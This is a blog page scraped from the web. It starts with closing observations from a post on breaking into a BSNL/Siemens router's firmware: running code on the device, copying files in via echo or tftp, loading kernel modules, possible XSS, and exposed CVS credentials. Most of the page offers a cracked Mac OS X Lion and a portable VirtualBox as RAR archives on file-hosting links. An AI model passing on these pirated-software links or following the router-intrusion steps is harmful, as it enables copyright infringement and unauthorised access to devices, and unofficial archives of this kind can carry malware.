  1. Observation 1 # - code can be run over the router , but files must be copied using echo (-ne with append option) or tftp. Since busybox is there, we can easily insert a kernel module to be run.
  2. Observation 2# - the webs directory has a lot of html files, maybe manipulated for xss attacks (i didnt covered it as its not my domain, some better guys can do it)
  3. Observation 3# - private CVS credentials of Siemindia pserver. insider attack ? :D kidding. pserver is already much insecure, but since i have seen a lot of organisations using stock/easily guessable passwords for their outer router/firewalls/vpn servers, its not a tough nut to crack.
  4. Observation 4# (most important) - BSNL SUCKS !




Till then .. Stay Gold


-
Rishabh Dangwal

Free Download Apple Mac OSX v10.7 Lion-iND

Apple Mac OSX v10.7 Lion-iND

Apple Mac OSX v10.7 Lion-iND (SerW name) | 3.53 GB

People have been doing the same things on computers for years. Clicking. Scrolling. Installing. Saving. With OS X Lion, we've challenged the accepted way of doing things by introducing new features that change the way you use a computer. Multi-Touch gestures transform the way you interact with your Mac, making all you do more intuitive and direct.


Now an even richer Multi-Touch experience comes to OS X Lion. Enjoy more fluid and realistic gesture responses, including rubber-band scrolling, page and image zoom, and full-screen swiping. OS X Lion offers systemwide support for gorgeous, full-screen apps that use every inch of your Mac display. You can have multiple full-screen apps open at once - along with multiple standard-size apps. And it's easy to switch between full-screen and desktop views.

DOWNLOAD

http://www.filesonic.com/folder/9858791


Mirror
http://www.wupload.com/file/92551026/Apple.Mac.OSX.v10.7.Lion-iND.part1.rar
http://www.wupload.com/file/92551442/Apple.Mac.OSX.v10.7.Lion-iND.part2.rar
http://www.wupload.com/file/92551826/Apple.Mac.OSX.v10.7.Lion-iND.part3.rar
http://www.wupload.com/file/92551497/Apple.Mac.OSX.v10.7.Lion-iND.part4.rar

Download VirtualBox 4.1.2 Final Portable (32bit) | 61 MB

VirtualBox 4.1.2 Final Portable (32bit)

VirtualBox 4.1.2 Final Portable (32bit) | 61 MB

VirtualBox is a general-purpose full virtualizer for x86 hardware. Targeted at server, desktop and embedded use, it is now the only professional-quality virtualization solution that is also Open Source Software. Modularity. VirtualBox has an extremely modular design with well-defined internal programming interfaces and a client/server design. This makes it easy to control it from several interfaces at once: for example, you can start a virtual machine in a typical virtual machine GUI and then control that machine from the command line, or possibly remotely.

VirtualBox also comes with a full Software Development Kit: even though it is Open Source Software, you don't have to hack the source to write a new interface for VirtualBox.


Virtual machine descriptions in XML. The configuration settings of virtual machines are stored entirely in XML and are independent of the local machines. Virtual machine definitions can therefore easily be ported to other computers.


Guest Additions for Windows, Linux and Solaris. VirtualBox has special software that can be installed inside Windows, Linux and Solaris virtual machines to improve performance and make integration much more seamless. Among the features provided by these Guest Additions are mouse pointer integration and arbitrary screen solutions (e.g. by resizing the guest window). There are also guest additions for OS/2 with somewhat reduced functionality.


Shared folders. Like many other virtualization solutions, for easy data exchange between hosts and guests, VirtualBox allows for declaring certain host directories as "shared folders", which can then be accessed from within virtual machines.


A number of extra features are available with the full VirtualBox release only (see the "Editions" page for details):


Virtual USB Controllers. VirtualBox implements a virtual USB controller and allows you to connect arbitrary USB devices to your virtual machines without having to install device specific drivers on the host.


Remote Desktop Protocol. Unlike any other virtualization software, VirtualBox fully supports the standard Remote Desktop Protocol (RDP). A virtual machine can act as an RDP server, allowing you to "run" the virtual machine remotely on some thin client that merely displays the RDP data.


USB over RDP. With this unique feature, a virtual machine that acts as an RDP server can still access arbitrary USB devices that are connected on the RDP client. This way, a powerful server machine can virtualize a lot of thin clients that merely need to display RDP data and have USB devices plugged in.

VirtualBox 4.1.2 Final Portable (32bit)

http://www.filesonic.com/file/1695283354/VirtualBox_4.1.2_32Bit_Portable.rar
or
http://www.wupload.com/file/108695516/VirtualBox_4.1.2_32Bit_Portable.rar

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code